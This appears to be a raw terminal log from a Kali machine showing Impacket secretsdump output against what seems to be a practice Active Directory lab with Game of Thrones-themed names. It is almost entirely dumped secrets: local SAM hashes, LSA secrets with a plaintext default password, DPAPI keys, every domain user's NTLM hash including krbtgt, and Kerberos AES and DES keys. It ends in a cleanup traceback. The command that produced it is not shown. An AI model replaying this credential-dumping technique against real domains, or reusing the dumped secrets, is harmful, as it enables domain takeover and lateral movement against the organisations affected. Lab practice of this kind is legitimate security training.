1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140
| ┌──(root㉿kaada)-[/home/kali/Desktop] └─ ┌──(root㉿kaada)-[/home/kali/Desktop] └─ Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x5c187ac5247c939e6bc15282bce1e92d [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC NORTH\WINTERFELL$:plain_password_hex:fd0dd579adf168c6cd4a3813bda4973d25bb8bd798e41c6a2f14de4eb21f1e2e979258e2402d6130460a16eb00827133d0ca596fb2aa503a839dc9e9a7c1a71acc35ee397c99d532d9c992dce4f0391102b1ce574b593d21aa6b51501aed76d3c93b862a51a9a8279e24fd74442cb5690a880d7c419646f0c0950b30bc8cbcd3dcf5785b393a7f9c0b5bcee7c97af2b9971cfd7c2f1c60b8f4da9ff1fdcc5f640a30cc5621a4420b9ee9281edc0eabdd3c04f9072f0adb6d9c6da79a1f0b70ad58d7ef2bd66e48a0e9de750faeebb4c188a522fb8459f218a8af10206addd5e9b4970ebccd286142e84e98375d3d2268 NORTH\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:f9a4c95e41bd1238887ce5e7ca12039a::: [*] DefaultPassword NORTH\robb.stark:sexywolfy [*] DPAPI_SYSTEM dpapi_machinekey:0x97a8af655dda4d3028aa6ca91e43d1033195e014 dpapi_userkey:0xbd0c69088f040653a8eef62ec8be6560ea41f2b8 [*] NL$KM 0000 A0 B9 07 4A 55 70 F9 F9 FA CC 68 30 15 F5 95 A2 ...JUp....h0.... 0010 58 69 29 AD 87 BA A5 9F 76 EB AC F3 07 63 71 5A Xi).....v....cqZ 0020 ED 26 C1 FC 5A 2B D3 25 A0 74 E6 E4 90 53 D5 19 .&..Z+.%.t...S.. 0030 E8 D6 BD D0 F3 36 76 5A A6 74 1B 5B D8 30 90 2A .....6vZ.t.[.0.* NL$KM:a0b9074a5570f9f9facc683015f595a2586929ad87baa59f76ebacf30763715aed26c1fc5a2bd325a074e6e49053d519e8d6bdd0f336765aa6741b5bd830902a [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:921fb182cfcf32e3a83332da4ad500b6::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d::: brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755::: samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:f9a4c95e41bd1238887ce5e7ca12039a::: CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:0dfd2a24c6bff862ced231c6aab1728a::: samaccount$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83::: SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:c54199154ad73c3fd01ec9f233dbb1c9::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972 Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0 Administrator:des-cbc-md5:fe58cdcd13a43243 krbtgt:aes256-cts-hmac-sha1-96:db2ad65b1eb1bb5a4fb4b3d55412b102e7deb11cade1166ec9097b9593b56d70 krbtgt:aes128-cts-hmac-sha1-96:c6e4a39a498e405fb41b96564b53caf2 krbtgt:des-cbc-md5:753dd6768f103779 vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24 vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1 vagrant:des-cbc-md5:16dc9e8ad3dfc47f arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df arya.stark:des-cbc-md5:13525243d6643285 eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4 eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203 eddard.stark:des-cbc-md5:8067f7abecc7d346 catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283 catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93 catelyn.stark:des-cbc-md5:6b314670a2f84cfb robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42 robb.stark:des-cbc-md5:c4b62c797f5dd01f sansa.stark:aes256-cts-hmac-sha1-96:a268e7a385f4f165c6489c18a3bdeb52c5e505050449c6f9aeba4bc06a7fcbed sansa.stark:aes128-cts-hmac-sha1-96:e2e6e885f6f4d3e25d759ea624961392 sansa.stark:des-cbc-md5:4c7c16e3f74cc4d3 brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10 brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73 brandon.stark:des-cbc-md5:76e61fda8a4f5245 rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287 hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60 hodor:des-cbc-md5:d5764373f2545dfd jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b jon.snow:des-cbc-md5:084358ceb3290d7c samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605 samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae samwell.tarly:des-cbc-md5:5efed0e0a45dd951 jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50 jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029 sql_svc:des-cbc-md5:8645d5cd402f16c7 WINTERFELL$:aes256-cts-hmac-sha1-96:536f18d284a034da7b3b2773ecd38b290da94cb60b140f3991e2a61d723084c6 WINTERFELL$:aes128-cts-hmac-sha1-96:925b7f6e5fa6fa831d02fefe3f27e927 WINTERFELL$:des-cbc-md5:67f84098a2c7fe3e CASTELBLACK$:aes256-cts-hmac-sha1-96:0db8d97ee33a620d961fe254ab70b6635d184be4c9795ac0244d6e8afb3a1ae6 CASTELBLACK$:aes128-cts-hmac-sha1-96:662441eb1d89f45693edda51b1e20aea CASTELBLACK$:des-cbc-md5:5d5ece267919f44c samaccount$:aes256-cts-hmac-sha1-96:7b9a52e2d94aa24dcea3d181001b03380291929a0094fa5b24f44d2a221faa89 samaccount$:aes128-cts-hmac-sha1-96:98c00ce456e342106141609163511daa samaccount$:des-cbc-md5:f8ab2001bcecc252 SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:685f215e60383f5b4ceab557a475291ced63a62d8b938e743253c1c4d4c72a36 SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:63cb1cb0fe6926ba1a71cff25ad6588b SEVENKINGDOMS$:des-cbc-md5:df23da31739ee90e [*] Cleaning up... [*] Stopping service RemoteRegistry [-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on. [*] Cleaning up... [*] Stopping service RemoteRegistry Exception ignored in: <function Registry.__del__ at 0x7f9b9dab0900> Traceback (most recent call last): File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__ File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new KeyError: 'Cryptodome.Cipher.AES' Exception ignored in: <function Registry.__del__ at 0x7f9b9dab0900> Traceback (most recent call last): File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__ File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new KeyError: 'Cryptodome.Cipher.AES'
|